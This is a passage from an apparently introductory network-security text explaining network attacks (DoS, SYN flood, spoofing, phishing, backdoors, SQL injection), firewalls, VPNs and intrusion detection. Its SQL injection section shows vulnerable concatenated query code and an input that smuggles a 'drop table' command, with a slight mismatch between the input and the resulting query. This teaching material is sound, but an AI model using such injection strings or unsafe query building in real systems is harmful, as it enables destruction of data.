network addresses are structured and that similar addresses imply proximity within the network.
Structured addresses allow a single routing table entry to represent the route to a group of
devices. In large networks, structured addressing (routing, in the narrow sense) outperforms
unstructured addressing (bridging). Routing has become the dominant form of addressing on the
Internet. Bridging is still widely used within localized environments.
Routing schemes differ in how they deliver messages:
• unicast delivers a message to a single specific node
• anycast delivers a message to any one out of a group of nodes, typically the one nearest to
the source
• multicast delivers a message to a group of nodes that have expressed interest in receiving
the message
• geocast delivers a message to a geographic area
• broadcast delivers a message to all nodes in the network
Unicast is the dominant form of message delivery on the Internet.
Introduction to AAA
AAA stands for Authentication, Authorization and Accounting. AAA is a set of primary
concepts that aid in understanding computer and network security as well as access control.
These concepts are used daily to protect property, data, and systems from intentional or even
unintentional damage. AAA is used to support the Confidentiality, Integrity, and Availability
(CIA) security concept.
Confidentiality: The term confidentiality means that data which is confidential should remain
confidential. In other words, a secret should stay secret.
Integrity: The term integrity means that the data being worked with is the correct data, and has
not been tampered with or altered.
Availability: The term availability means that the data you need should always be available to
you.
Authentication provides a way of identifying a user, typically by requiring a valid user
ID/password combination before granting a session. The authentication process controls access
by requiring valid user credentials. After authentication completes successfully, the user must be
given authorization (permission) to carry out tasks on the server. Authorization is the process
that determines whether the user has the authority to carry out a specific task; it controls access
to resources after the user has been authenticated. The last one is Accounting, which keeps track
of the activities the user has performed on the server.
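The three AAA steps can be sketched in a minimal form. The user database, salting scheme, and permission sets below are hypothetical, invented only to show the authenticate/authorize/account sequence.

```python
import hashlib

# Hypothetical user database: user -> (salted password hash, allowed actions).
USERS = {
    "alice": (hashlib.sha256(b"salt" + b"s3cret").hexdigest(), {"read", "write"}),
}
AUDIT_LOG = []  # accounting: one record per attempted action

def authenticate(user, password):
    entry = USERS.get(user)
    return entry is not None and \
        hashlib.sha256(b"salt" + password.encode()).hexdigest() == entry[0]

def authorize(user, action):
    return action in USERS[user][1]

def perform(user, password, action):
    if not authenticate(user, password):
        AUDIT_LOG.append((user, action, "auth-failed"))
        return "authentication failed"
    allowed = authorize(user, action)
    AUDIT_LOG.append((user, action, "allowed" if allowed else "denied"))
    return "ok" if allowed else "authorization denied"

print(perform("alice", "s3cret", "write"))   # ok
print(perform("alice", "wrong", "write"))    # authentication failed
print(perform("alice", "s3cret", "delete"))  # authorization denied
```

Note that accounting records every attempt, including the failed ones: that audit trail is what lets an administrator reconstruct what a user did.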

Types of Network Attacks

• Denial of Service (DoS) attack

The idea of a DoS attack is to reduce the quality of service offered by a server, or to crash the server
with a heavy workload. A DoS (Denial of Service) attack does not involve breaking into the target
server. It is normally achieved either by overloading the target network or server, or by sending
network packets that cause extreme confusion at the target network or server.

A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate
users of a service from using that service. Some examples are:

• Attempts to "flood" a network, thereby preventing legitimate network traffic.

• Attempts to disrupt connections between two machines, thereby preventing access to a service.

• Attempts to prevent a particular individual from accessing a service.

• Attempts to disrupt service to a specific system or person.

One simple DoS (Denial of Service) attack was called the "Ping of Death." The Ping of Death
exploited the simple TCP/IP troubleshooting tool ping: attackers sent oversized or malformed ping
packets that could ultimately crash the target server.

• Distributed Denial of Service (DDoS) attack


A Distributed Denial of Service (DDoS) attack is a type of Denial of Service (DoS) attack in which
multiple systems flood the bandwidth or overload the resources of a targeted server.

In a DDoS attack, an intruder compromises one computer and makes it the DDoS master. Using this
master, the intruder identifies and communicates with other systems that can be compromised, then
installs DDoS tools on all of the compromised systems. With a single command, the intruder
instructs the compromised computers to launch flood attacks against the target server. Thousands of
compromised computers flood or overload the resources of the target server, preventing legitimate
users from accessing the services it offers.

• SYN attack

Before understanding what a SYN attack is, we need to know about the TCP/IP three-way handshake
mechanism. A Transmission Control Protocol/Internet Protocol (TCP/IP) session is initiated with a
three-way handshake: the two communicating computers exchange SYN, SYN/ACK and ACK
segments to initiate a session. The initiating computer sends a SYN packet, to which the responding
host issues a SYN/ACK and waits for an ACK reply from the initiator.

The SYN flood attack is the most common type of flooding attack. It occurs when the attacker sends
a large number of SYN packets to the victim, forcing it to wait for replies that never come: the third
part of the TCP three-way handshake is never executed. Because the host is tied up waiting for a
large number of replies, real service requests are not processed, bringing down the service. The
source address of the SYN packets in a SYN flood attack is typically set to an unreachable host,
which makes it very difficult to trace the attacking computer.

SYN cookies provide protection against SYN floods. A SYN cookie is a specially constructed initial
TCP sequence number chosen by the TCP software, used as a defense against SYN flood attacks.
Using stateful firewalls that reset pending TCP connections after a specific timeout can also reduce
the effect of a SYN attack.
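The idea behind SYN cookies can be sketched as follows: the server derives the initial sequence number from the connection 4-tuple, a coarse timestamp, and a secret key, so it does not need to keep half-open connection state, and it can validate the client's later ACK by recomputing the cookie. This is a simplified model of the concept, not the exact algorithm any particular kernel uses; the secret and addresses are invented.

```python
import hashlib
import hmac
import time

SECRET = b"server-secret"  # hypothetical per-server key

def syn_cookie(src_ip, src_port, dst_ip, dst_port, when=None):
    """Derive a 32-bit initial sequence number from the connection 4-tuple."""
    # Coarse time slot so old cookies eventually expire (limits replay).
    slot = int((time.time() if when is None else when) // 64)
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}:{slot}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:4], "big")

def valid_ack(ack_seq, src_ip, src_port, dst_ip, dst_port, when=None):
    # The client's ACK must acknowledge cookie + 1; no per-connection
    # state was stored, we simply recompute the cookie and compare.
    return ack_seq == ((syn_cookie(src_ip, src_port, dst_ip, dst_port, when) + 1)
                       & 0xFFFFFFFF)

c = syn_cookie("203.0.113.5", 40000, "198.51.100.1", 80, when=1000)
print(valid_ack((c + 1) & 0xFFFFFFFF, "203.0.113.5", 40000,
                "198.51.100.1", 80, when=1000))  # True: genuine handshake
print(valid_ack((c + 2) & 0xFFFFFFFF, "203.0.113.5", 40000,
                "198.51.100.1", 80, when=1000))  # False: wrong ACK number
```

Because forged SYNs from unreachable hosts never produce a valid ACK, they consume no connection-table memory on the server.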

• Sniffer Attack

A sniffer is an application that can capture network packets. Sniffers are also known as network
protocol analyzers. While protocol analyzers are really network troubleshooting tools, they are also
used by hackers to attack networks. If network packets are not encrypted, the data inside them can be
read using a sniffer. Sniffing refers to the process attackers use to capture network traffic with a
sniffer. Once a packet is captured, its contents can be analyzed. Hackers use sniffers to capture
sensitive network information such as passwords, account information, etc.
Many sniffers are available for free download. Leading packet sniffers include Wireshark, dsniff,
EtherPeek, and Sniffit.

• Man-In-The-Middle (MITM) attack

A Man-In-The-Middle (MITM) attack is one where attackers intrude into an existing
communication between two computers and then monitor, capture, and control the communication.
In a man-in-the-middle attack, an intruder assumes a legitimate user's identity to gain control of the
network communication. The other end of the communication path may believe it is still talking to
you and keep exchanging data.

Man-in-the-Middle (MITM) attacks are also known as "session hijacking attacks", meaning the
attacker hijacks a legitimate user's session to control the communication.

Many preventive methods are available for Man-In-The-Middle (MITM) attack and some are listed
below.

• Public Key Infrastructure (PKI) technologies,

• Verifying delay in communication

• Stronger mutual authentication

• IP Address Spoofing Attack

IP address spoofing is a type of attack in which an attacker assumes the source Internet Protocol (IP)
address of IP packets to make it appear as though a packet is coming from another, valid IP address.
In IP address spoofing, IP packets are generated with fake source IP addresses in order to
impersonate other systems or to protect the identity of the sender.

To explain this clearly: in IP address spoofing, the IP address placed in the source field of the IP
header is not the real IP address of the computer where the packet originated. By changing the
source IP address, the actual sender can make it look like the packet was sent by another computer;
the response from the target computer will be sent to the fake address specified in the packet, and
the identity of the attacker is also protected.

Packet filtering is a method to prevent IP spoofing attacks. Blocking packets arriving from outside
the network with a source address inside the network (ingress filtering), and blocking packets
leaving the network with a source address outside the network (egress filtering), can help prevent IP
spoofing attacks.
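The ingress and egress rules just described can be sketched as a single check on a border device: a packet's source address must be consistent with the direction it is travelling. The internal address range below is assumed for illustration.

```python
import ipaddress

# Hypothetical internal address range of the protected network.
INTERNAL = ipaddress.ip_network("192.168.0.0/16")

def allow(packet_src: str, arriving_from_outside: bool) -> bool:
    """Anti-spoofing check at the network border.

    Ingress rule: a packet from outside must not claim an inside source.
    Egress rule: a packet from inside must not claim an outside source.
    """
    src_is_internal = ipaddress.ip_address(packet_src) in INTERNAL
    if arriving_from_outside:
        return not src_is_internal   # ingress filtering
    return src_is_internal           # egress filtering

print(allow("192.168.1.10", arriving_from_outside=True))   # False: spoofed inside address
print(allow("8.8.8.8", arriving_from_outside=True))        # True: plausible outside source
print(allow("10.0.0.5", arriving_from_outside=False))      # False: spoofed outside address
```

Egress filtering also protects the rest of the Internet: it stops your own network being used as a launch point for spoofed-source attacks.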

• ARP (Address Resolution Protocol) Spoofing Attacks


A computer connected to an IP/Ethernet Local Area Network has two addresses. One is the MAC
(Media Access Control) address, a globally unique and unchangeable address burned onto the
network card itself. MAC addresses are necessary so that the Ethernet protocol can send data back
and forth, independent of whatever application protocols are used on top of it. Ethernet sends and
receives data based on MAC addresses. The MAC address is also known as the Layer 2 address,
physical address or hardware address.

The other address is the IP address. IP is a protocol used by applications, independent of whatever
network technology operates underneath it. Each computer on a network must have a unique IP
address to communicate, and applications use IP addresses to communicate. The IP address is also
known as the Layer 3 address or logical address.

To explain it more clearly: applications use IP addresses for communication, while the underlying
hardware uses MAC addresses. If an application running on one computer needs to communicate
with another computer using an IP address, the first computer must resolve the MAC address of the
second, because the lower-layer Ethernet technology uses MAC addresses to deliver data. This
resolution is performed by ARP (Address Resolution Protocol).

Operating Systems keep a cache of ARP replies to minimize the number of ARP requests. ARP is a
stateless protocol and most operating systems will update their cache if a reply is received, regardless
of whether they have sent out an actual request.

ARP Spoofing attacks (also called ARP flooding or ARP poisoning) allow an attacker to sniff data
frames on a local area network (LAN), modify traffic, etc. ARP Spoofing attacks work by sending
fake ARP messages onto an Ethernet LAN. The purpose is to associate the attacker's MAC address
with the IP address of another computer, generally the default gateway. Any traffic sent to the
default gateway is then mistakenly sent to the attacker instead. The attacker can forward the traffic
to the actual default gateway after sniffing it, or modify the data before forwarding it.
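The cache-update weakness that ARP poisoning abuses can be modeled in a few lines: because ARP is stateless, a typical stack updates its cache on any reply, even one it never asked for. The IP and MAC addresses below are made up for illustration.

```python
# Toy model of an ARP cache on a victim host.
arp_cache = {"10.0.0.1": "aa:aa:aa:aa:aa:aa"}  # real gateway MAC (hypothetical)

def handle_arp_reply(cache, ip, mac):
    # No check that a matching request was ever sent: the cache is
    # simply overwritten, which is exactly what ARP spoofing abuses.
    cache[ip] = mac

# Attacker sends a forged, unsolicited reply binding the gateway's IP
# address to the attacker's MAC address.
handle_arp_reply(arp_cache, "10.0.0.1", "ee:ee:ee:ee:ee:ee")

# Frames for the gateway are now delivered to the attacker instead.
print(arp_cache["10.0.0.1"])  # ee:ee:ee:ee:ee:ee
```

Defenses include static ARP entries for critical hosts and switch features such as dynamic ARP inspection.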

• DNS (Domain Name System) Spoofing Attacks

DNS is short for Domain Name System. DNS is a required service in TCP/IP networks; it translates
domain names into IP addresses. Computers in the network communicate using IP addresses, and
IPv4 addresses are 32-bit numbers that are difficult to remember. Domain names are alphabetic and
easier for humans to remember. When we use a domain name to communicate with another host, the
DNS service must translate the name into the corresponding IP address.

DNS Servers keep a database of domain names and their corresponding IP addresses. DNS Spoofing
attacks are made by changing the entry for a legitimate server in the DNS server so that its name
points to some other IP address, thereby hijacking the identity of the server.
Generally there are two types of DNS poisoning attacks; DNS cache poisoning and DNS ID Spoofing.

In DNS cache poisoning, a DNS server is made to cache entries that did not originate from
authoritative Domain Name System (DNS) sources. In DNS ID spoofing, an attacker obtains the
random identification number of a DNS request and replies with a fake IP address using that
identification number.

• Phishing and Pharming Spoofing attacks

A phishing spoofing attack is a combination of e-mail spoofing and web site spoofing. The attacker
starts the phishing attack by sending bulk e-mails impersonating a web site they have spoofed.
Normally the phishing e-mails appear to come from legitimate financial organizations such as banks,
alerting the user that they need to log in to their account for one reason or another. A link is
provided in the e-mail to a fake web site designed to look very similar to the bank's web site.
Normally the link's anchor text is the real URL of the bank's web site, but the anchor's target is a
URL or IP address of a web site under the attacker's control. Once the user enters the
userid/password combination and submits those values, the attacker collects them and the web
page is redirected to the real site.

Pharming is another spoofing attack, in which the attacker tampers with the DNS (Domain Name
System) so that traffic to a web site is secretly redirected to a fake site altogether, even though the
browser seems to be displaying the web address you wanted to visit.

• Backdoor Attacks

A backdoor in an Operating System or a complex application is a method of bypassing normal
authentication and gaining access. During the development of an Operating System or application,
programmers add back doors for different purposes, and the backdoors are removed when the
product is ready for shipping or production. When a backdoor that was not removed is detected, the
vendor releases a maintenance upgrade or patch to close it.

Another type of back door can be an installed program or a modification to an existing program.
The installed program may allow a user to log on to the computer without a password, with
administrative privileges. Many programs are available on the Internet to create back doors on
systems; one of the more popular tools is Back Orifice, which is available for free download on the
Internet.

• Password Guessing Attacks

Another type of network attack is the password guessing attack. Here a legitimate user's access
rights to a computer and network resources are compromised by identifying the user ID/password
combination of the legitimate user.

Password guessing attacks can be classified into two types.


Brute Force Attack: A brute force attack is a type of password guessing attack that consists of
trying every possible code, combination, or password until the correct one is found. This type of
attack can take a long time to complete; a complex password greatly lengthens the time a brute
force search needs.

Dictionary Attack: A dictionary attack is another type of password guessing attack which uses a
dictionary of common words to identify the user's password.
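The two attack styles above differ only in what candidate list is tried. A dictionary attack against a stolen password hash can be sketched as below; the hash scheme (unsalted SHA-256, a deliberately weak choice), the stolen hash, and the word list are all invented for illustration.

```python
import hashlib

# Hypothetical stolen password hash (unsalted SHA-256 -- a weak scheme).
stolen_hash = hashlib.sha256(b"dragon").hexdigest()

# Tiny sample dictionary; real attacks use word lists with millions of entries.
WORDLIST = ["password", "letmein", "dragon", "qwerty"]

def dictionary_attack(target_hash, wordlist):
    """Try each dictionary word until one hashes to the target."""
    for word in wordlist:
        if hashlib.sha256(word.encode()).hexdigest() == target_hash:
            return word
    # A brute-force attack would instead enumerate every possible
    # combination of characters, which is far slower but exhaustive.
    return None

print(dictionary_attack(stolen_hash, WORDLIST))  # dragon
```

This is why password policies forbid dictionary words, and why servers should store salted, slow hashes rather than plain SHA-256.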

• SQL Injection Attacks

A SQL injection attack is another type of attack that exploits applications which use client-supplied
data in SQL statements. Malicious code is inserted into strings that are later passed to the database
for parsing and execution. The common method of SQL injection is direct insertion of malicious
code into user-input variables that are concatenated with SQL commands and executed. Another
form injects malicious code into strings that are stored in tables; the attack is then triggered later
when the stored data is used.

The following example shows the simplest form of SQL injection.

var UserID;
UserID = Request.form ("UserID");
var InfoUser = "select * from UserInfo where UserID = '" + UserID + "'";

If the user fills the field with a valid UserID (F827781), after the script executes the SQL query
will look like

SELECT * FROM UserInfo WHERE UserID = 'F827781'

Consider a case when a user fills the field with the below entry.

F827781; drop table UserInfo--

After the execution of the script, the SQL code will look like

SELECT * FROM UserInfo WHERE UserID = 'F827781';drop table UserInfo--'

The "--" comments out the trailing quote, so the injected second statement is valid. This will
ultimately result in deletion of the table UserInfo.
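The standard defense is to pass user input as a bound parameter instead of concatenating it into the SQL string, so the input can never terminate the string literal and smuggle in a second statement. A minimal sketch using Python's sqlite3 module; the table and values are invented to mirror the example above.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE UserInfo (UserID TEXT, Name TEXT)")
conn.execute("INSERT INTO UserInfo VALUES ('F827781', 'Alice')")

# The same hostile input as in the concatenation example.
user_supplied = "F827781'; drop table UserInfo--"

# The ? placeholder keeps the input as pure data: the database never
# parses it as SQL, so no second statement can be injected.
rows = conn.execute(
    "SELECT * FROM UserInfo WHERE UserID = ?", (user_supplied,)
).fetchall()
print(rows)  # []: no user has that literal ID

# The table survived the "attack".
print(conn.execute("SELECT COUNT(*) FROM UserInfo").fetchone()[0])  # 1
```

Every mainstream database API offers the same mechanism (placeholders or prepared statements); using it consistently eliminates this whole attack class.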

Defense against Network Attack


Configuration Management
The main weapon in network attack defense is tight configuration management. The following
measures should be strictly implemented as part of configuration management.
• All machines in your network should run up-to-date copies of the operating system and be
updated immediately whenever a new service pack or patch is released.
• All configuration files in your Operating Systems and applications should be properly secured.
• All default passwords in your Operating Systems and applications should be changed after
installation.
• Implement tight security for root/Administrator passwords.
Firewalls
Another weapon for defense against network attacks is the firewall. A firewall is a device and/or
software that stands between a local network and the Internet, and filters traffic that might be
harmful. Firewalls can be classified into four types based on whether they filter at the IP packet
level, at the TCP session level, at the application level, or are hybrids.
1. Packet Filtering: Packet filtering firewalls function at the IP packet level. They filter packets
based on addresses and port numbers. Packet filtering firewalls can be used as a weapon in network
attack defense against Denial of Service (DoS) attacks and IP spoofing attacks.
2. Circuit Gateways: Circuit gateway firewalls operate at the transport layer, which means that
they can reassemble, examine or block all the packets in a TCP or UDP connection. Circuit
gateway firewalls can also create a Virtual Private Network (VPN) over the Internet by doing
encryption from firewall to firewall.
3. Application Proxies: Application proxy-based firewalls function at the application level. At
this level, you can block or control traffic generated by applications. Application Proxies can
provide very comprehensive protection against a wide range of threats.
4. Hybrid: A hybrid firewall may consist of a packet filtering firewall combined with an application
proxy firewall, or a circuit gateway combined with an application proxy firewall.
Encryption
Encryption is another great weapon in defense against network attacks. Encryption can provide
protection against eavesdropping and sniffer attacks. Public Key Infrastructure (PKI) technologies,
Internet Protocol Security (IPSec), and Virtual Private Networks (VPN), when implemented
properly, can secure your network against network attacks.
Other tips for defense against network attacks are:
• Strict control of privilege escalation at different levels, and strict password policies
• Tight physical security for all your machines, especially servers
• Tight physical security and isolation for your backup data

Introduction to Infrastructure Security

Network infrastructure includes networks, network devices, servers, workstations, and other devices. The
software running on these devices is also part of the network infrastructure. To keep your network secure,
verify every time a configuration is changed or a new device is added that you are not creating a hole in your
security. A typical network comprises routers, firewalls, switches, servers and workstations.

Firewalls, Packet Filtering Firewalls, Circuit Gateways,


Application Firewalls (Proxies), Hybrid Firewalls
A firewall is hardware and/or software which functions in a networked environment to block
unauthorized access while permitting authorized communications: it stands between a local network
and the Internet, and filters traffic that might be harmful. Firewalls can be either stand-alone
systems or included in other devices such as routers or servers.

Hardware firewalls are separate devices which function as dedicated firewalls (they also contain
software, but it is normally stored in ROM to prevent tampering). Cisco and Check Point are two
leading companies which make hardware firewalls.

Software firewalls can be installed on servers or workstations and help to prevent unwanted
inbound and outbound traffic. Microsoft ISA Server, ZoneAlarm, Comodo, etc. are some leading
software-based firewalls. The Linux Operating System includes an open-source firewall
called iptables.

Firewalls can be classified into four types based on whether they filter at the IP packet level, at the
TCP session level, at the application level, or are hybrids.

1. Packet Filtering Firewalls: Packet filtering firewalls function at the IP packet level. They filter
packets based on addresses and port numbers. Packet filtering firewalls can be used as a weapon in
network attack defense against Denial of Service (DoS) attacks and IP spoofing attacks.

2. Circuit Gateways: Circuit gateway firewalls operate at the transport layer, which means that
they can reassemble, examine or block all the packets in a TCP or UDP connection. Circuit
gateway firewalls can also create a Virtual Private Network (VPN) over the Internet by doing
encryption from firewall to firewall.

3. Application Level Firewalls (Proxies): Application proxies are configured on a multi-homed
server and are often used instead of router-based traffic controls to prevent traffic from passing
directly between networks. Application proxy-based firewalls function at the application level. At
this level, you can block or control traffic generated by applications. Application-level firewalls
can enforce correct application behavior and help to block malicious activity. They can also log
user activity, and may include protection against spam and viruses. Application-level firewalls can
block web sites based on their content rather than just their IP address. Application proxies can
provide very comprehensive protection against a wide range of threats.

4. Hybrid Firewalls: A hybrid firewall may consist of a packet filtering firewall combined with an
application proxy firewall, or a circuit gateway combined with an application proxy firewall.
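The address-and-port matching that a packet filtering firewall performs can be sketched as a first-match rule list with a default-deny policy. The rules, protocols, and ports below are invented for illustration.

```python
# Toy packet filter: the first matching rule wins; anything that matches
# no rule falls through to a default-deny policy.
RULES = [
    {"action": "allow", "proto": "tcp", "dst_port": 80},   # web traffic in
    {"action": "allow", "proto": "tcp", "dst_port": 443},  # HTTPS in
    {"action": "deny",  "proto": "tcp", "dst_port": 23},   # block telnet
]

def filter_packet(proto, dst_port):
    for rule in RULES:
        if rule["proto"] == proto and rule["dst_port"] == dst_port:
            return rule["action"]
    return "deny"  # default deny: anything not explicitly allowed is dropped

print(filter_packet("tcp", 443))  # allow
print(filter_packet("tcp", 23))   # deny (explicit rule)
print(filter_packet("udp", 53))   # deny (no rule matches, default applies)
```

Real packet filters match on source/destination addresses and flags as well, but the first-match, default-deny structure is the same idea used by iptables chains and router access lists.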

What is a router and the functions of router?


A router is another network infrastructure device that directs packets through the network based
on information from the Network Layer (Layer 3) of the OSI model. A router uses a combination of
hardware and software to "route" data from its source to its destination. A router can be configured
to route data packets from different network protocols, like TCP/IP, IPX/SPX, and AppleTalk.

Routers segment large networks into logical segments called subnets. The division of the network
is based on the Layer 3 addressing system, such as IP addresses. If a Network Layer (Layer 3) data
packet (IP datagram) is addressed to another device on the local subnet, the packet does not cross
the router, so it cannot create traffic congestion in another network. If data is addressed to a
computer outside the subnet, the router forwards the data to the addressed network. Routing
network data in this way helps conserve network bandwidth.

Routers are the first line of defense for your network and must be configured to pass only traffic
that is authorized by the network administrators. Thus a router can function as a firewall if it is
configured properly.



What is a Hub?
Hubs were the common network infrastructure devices used for LAN connectivity but switches are rapidly
replacing hubs. Hubs function as the central connection point for LANs. Hubs are designed to work with
Twisted pair cabling and normally use RJ45 jack to connect the devices. Network devices (Servers,
Workstations, Printers, Scanners etc) are attached to the hub by individual network cables. Hubs usually come
in different shapes and different numbers of ports.

When a hub receives a packet of data (an Ethernet frame) at one of its ports from a network device, it transmits
(repeats) the packet out all of its other ports to all of the other network devices. If two network devices on the
same network try to send packets at the same time, a collision is said to occur.

Hubs operate in such a way that all data received through one port is sent to all other ports. This creates an
extremely insecure environment: anyone with a sniffer can capture any unencrypted traffic on the network.
Hubs are insecure LAN devices that should be replaced with switches for security and increased bandwidth.

Hubs are considered to operate at the Physical Layer (Layer 1) of the OSI model.
What are bridges and switches?
A bridge is a network device that operates at the Data Link Layer (Layer 2) of the OSI model. There
are many different types of bridges, including transparent bridges, encapsulation bridges, and
source-route bridges (source-route bridges are for Token Ring networks). Bridges allow segmenting
a local network into multiple segments, thus reducing network traffic. A bridge performs the
segmenting function by examining the Data Link Layer (Layer 2) data packet (Ethernet frame)
and forwarding the packet to other physical segments only if necessary. Both switches and bridges
function using the Data Link Layer (Layer 2) addressing system, also known as MAC addresses.

A bridge can connect only two networks, LANs or hosts, which means that a bridge has only two
ports, while a switch can connect more than two networks, LANs or hosts because a switch normally
has more than two ports (usually 24 or 48). Simply put, a bridge with more than two ports is known
as a switch. Bridges and switches are considered to operate at the Data Link Layer (Layer 2) of the
OSI model.
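The forwarding behavior described above can be sketched as a toy MAC-learning table in Python (a simplified model under stated assumptions, not any vendor's actual implementation; the MAC addresses and port numbers are made up):

```python
# Toy sketch of a learning switch: it records which port each source MAC was
# seen on. Frames to a known MAC go out one port; frames to an unknown MAC
# are flooded out every other port, like a hub.

def switch_forward(mac_table, in_port, src_mac, dst_mac, all_ports):
    mac_table[src_mac] = in_port                   # learn the sender's port
    if dst_mac in mac_table:                       # known destination
        return [mac_table[dst_mac]]
    return [p for p in all_ports if p != in_port]  # unknown: flood

table = {}
ports = [1, 2, 3, 4]
print(switch_forward(table, 1, "aa:aa", "bb:bb", ports))  # unknown -> flood [2, 3, 4]
print(switch_forward(table, 2, "bb:bb", "aa:aa", ports))  # learned -> [1]
```

After the first frame the switch has learned where "aa:aa" lives, so the reply is forwarded out a single port instead of being repeated everywhere — the key difference from a hub.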

The following picture shows a 24 port, 10/100, Cisco 2500 Catalyst Switch.

What is Remote Access Services (RAS)?
Remote Access Services (RAS) refers to any combination of hardware and software which allows
you to connect from your computer at home or a remote location to your corporate network and
work as if you were connected directly to the corporate network.

Corporate users can connect to the corporate network using a direct dial-up connection or
through a Virtual Private Network (VPN), where a low-cost intermediate network (such as the
Internet) is used to connect to the corporate network. Microsoft Routing and Remote Access
Services is an example of Remote Access Services (RAS).

Dial-up networking is a remote access connection in which a remote access client makes a
nonpermanent, dial-up connection to a physical port on a remote access server, using the service
of a third-party telecom provider over an analog phone or ISDN connection.

Virtual Private Networking (VPN) is a logical, indirect connection between the Virtual Private
Networking (VPN) client and the Virtual Private Networking (VPN) server over a low cost public
network such as the Internet. A Virtual Private Networking (VPN) client uses Virtual Private
Networking (VPN) protocols called tunneling protocols to make a virtual call to a virtual port on
a Virtual Private Networking (VPN) server.

What is a Virtual Private Network (VPN)?
A Virtual Private Network (VPN) can be viewed as a private network which is connected through
a public network. Virtual Private Networks (VPNs) are used to connect LANs together across the
Internet. Using VPN technologies, remote users can connect to the enterprise network securely
over the public Internet as if their computers were physically connected to the network.

Virtual Private Network (VPN) connections use either Point-to-Point Tunneling Protocol (PPTP)
or Layer Two Tunneling Protocol/Internet Protocol security (L2TP/IPSec) over internet. Internet
connections are usually cheaper than leased line, Dial-up, ISDN or similar type of connections.
Since Internet is the connection medium, Virtual Private Network (VPN) can save huge telecom
costs.

Point-to-Point Tunneling Protocol (PPTP)

PPTP was created by Microsoft and has been available since Windows NT 4.0 Routing and Remote
Access Services. Point-to-Point Tunneling Protocol (PPTP) encrypts the data it encapsulates, but
the header is not encrypted. Since the VPN header is not encrypted, an eavesdropper can read it,
but the data is reasonably secure since the contents are encrypted.

Layer 2 Tunneling Protocol (L2TP)

Layer 2 Tunneling Protocol (L2TP) is another VPN tunneling protocol, used together with
Internet Protocol Security (IPSec). IPSec encrypts the entire L2TP packet. An advantage of L2TP
over PPTP is that eavesdroppers cannot identify that a VPN is in use, because IPSec encrypts the
L2TP header information as well. Hence the L2TP/IPSec protocol is much more secure than Point-
to-Point Tunneling Protocol (PPTP).
Intrusion Detection Systems (IDS), Network Intrusion
Detection System (NIDS), Host Intrusion Detection System
(HIDS), Signatures, Alerts, Logs, False Alarms, Sensor
Intrusion detection is a set of techniques and methods used to detect suspicious activity at both
the network and host level. Intrusion detection is the act of detecting a hostile user or intruder
who is attempting to gain unauthorized access, or trying to disturb services or deny services to
legitimate users. An Intrusion Detection System (IDS) is software, a device, or a combination of
both that monitors and tracks network intrusion attempts, malicious activities or policy violations
and produces reports for the security administrators.

Basically, an Intrusion Detection System (IDS) is also a sniffer: an IDS detects an intrusion by
sniffing and analyzing the network packets.

The most popular open-source Intrusion Detection System (IDS) is Snort, developed
by Sourcefire. Snort can detect thousands of worms, vulnerability exploit attempts, port scans,
and other suspicious activities. Snort is available for both Linux and Windows platforms as
source files and binaries.

Following are some definitions related to Intrusion Detection Systems (IDS).

Intrusion Detection System (IDS)

Intrusion Detection System (IDS) is software, or a device or combination of both used to detect
intruder activity.

Network Intrusion Detection System (NIDS)

A Network Intrusion Detection System (NIDS) usually consists of a network appliance (or sensor)
with a Network Interface Card (NIC) operating in promiscuous mode and a separate management
interface. The IDS is placed along a network segment or boundary and monitors all traffic on
that segment. When a packet matches an intruder signature, an alert is generated and/or the
packet is logged to a file or database.

Host Intrusion Detection System (HIDS)

A Host Intrusion Detection System (HIDS) consists of software applications (agents) installed on
the workstations which are to be monitored. The agents monitor the operating system and write
data to log files and/or trigger alarms. A Host Intrusion Detection System (HIDS) can only
monitor the individual workstations on which the agents are installed; it cannot monitor the
entire network.
Signatures

A signature is the pattern that you look for inside a data packet. Each attack has its own specific
signatures, and a signature is used to detect one or multiple types of attacks. Signatures can be
identified from the IP header, the transport layer protocol header (TCP or UDP header) or from the data.
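As a toy illustration of signature matching (the signature names, ports and packet contents below are hypothetical examples, far simpler than real Snort-style rules):

```python
# Toy sketch of IDS signature matching: each signature pairs a destination
# port with a byte pattern to look for in the payload.

SIGNATURES = [
    {"name": "fake-exploit-A", "port": 80, "pattern": b"/etc/passwd"},
    {"name": "fake-exploit-B", "port": 21, "pattern": b"USER anonymous"},
]

def match_signatures(dst_port: int, payload: bytes):
    """Return the names of all signatures the packet matches."""
    return [s["name"] for s in SIGNATURES
            if s["port"] == dst_port and s["pattern"] in payload]

print(match_signatures(80, b"GET /../../etc/passwd HTTP/1.0"))  # ['fake-exploit-A']
print(match_signatures(80, b"GET /index.html HTTP/1.0"))        # []
```

A real IDS applies thousands of such rules, with far richer matching on headers, flags and reassembled streams, but the principle is the same.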

Alerts

Alerts are any sort of user notification of intruder activity. When an IDS detects an intruder,
it has to inform the security administrator about this using alerts.

Logs

The log messages are usually saved in a file for future analysis.

False Alarms

False alarms are alerts generated by activity that is not actually intruder activity.

Sensor

The machine on which an intrusion detection system is running is also called the sensor in the
literature because it is used to "sense" the network.

A firewall is hardware and/or software which functions in a networked environment to block
unauthorized access while permitting authorized communications. A firewall is a device and/or
software that stands between a local network and the Internet, and filters traffic that might be
harmful.

An Intrusion Detection System (IDS) is a software or hardware device installed on the network
(NIDS) or host (HIDS) to detect and report intrusion attempts to the network.

We can think of a firewall as security personnel at the gate, and an IDS device as a security
camera after the gate. A firewall can block a connection, while an Intrusion Detection System
(IDS) cannot; an IDS alerts the security administrator to any intrusion attempts.

However, an Intrusion Detection and Prevention System (IDPS) can block a connection if it
finds that the connection is an intrusion attempt.
Types of Intrusion Detection Systems (IDS)

Intrusion Detection Systems (IDS) can be classified in different ways. The major classifications are active
and passive IDS, and Network Intrusion Detection Systems (NIDS) versus Host Intrusion Detection Systems (HIDS).
Active and passive IDS
An active Intrusion Detection System (IDS) is also known as an Intrusion Detection and
Prevention System (IDPS). An IDPS is configured to automatically block suspected attacks
without any intervention required by an operator. An IDPS has the advantage of providing
real-time corrective action in response to an attack.

A passive IDS is a system that’s configured to only monitor and analyze network traffic activity
and alert an operator to potential vulnerabilities and attacks. A passive IDS is not capable of
performing any protective or corrective functions on its own.

Network Intrusion detection systems (NIDS) and Host Intrusion detection systems (HIDS)

A Network Intrusion Detection System (NIDS) usually consists of a network appliance (or sensor)
with a Network Interface Card (NIC) operating in promiscuous mode and a separate management
interface. The IDS is placed along a network segment or boundary and monitors all traffic on
that segment.

